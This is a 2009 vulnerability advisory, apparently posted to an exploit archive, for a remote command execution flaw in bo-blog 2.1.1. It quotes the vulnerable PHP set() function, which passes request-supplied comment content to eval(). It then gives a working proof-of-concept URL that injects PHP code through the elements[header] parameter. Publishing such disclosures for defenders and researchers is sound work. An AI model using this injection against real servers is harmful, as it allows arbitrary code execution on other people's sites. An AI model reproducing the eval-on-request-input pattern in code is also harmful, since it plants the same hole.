boblog-exec.txt
Posted on 10 September 2009
########################## Securitylab.ir ######################## # Application Info: # Name: bo-blog # Version: 2.1.1 # Download: http://www.bo-blog.com/download/release/Bo-blogV2.1.1.tar.gz ################################################################# # Discoverd By: Securitylab.ir # Website: http://securitylab.ir # Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir ################################################################# # Vulnerability Info: # Type: Remote Command Execution Vulnerabilities # Risk: High #=========================================================== # boblog_class_run.php (in /inc/ folder) # # <... # function set($elementname, $array, $inherit=0) { # global $elements, $tptvalue; # if ($inherit==1) global $content; # $content[$elementname]=$elements[$elementname]; # # # $a=preg_match("/<!-- php --><!--(.+?)--><!-- /php -->/is", $content # #[$elementname], $phpcode_array); # if ($a!=0) { # $phpcode=$phpcode_array[1]; # eval($phpcode); # ...> # # http://localhost/blog/inc/boblog_class_run.php?elements[header]=<!-- php --><!--phpinfo();--><!-- /php --> #=========================================================== ################################################################# # Securitylab Security Research Team ###################################################################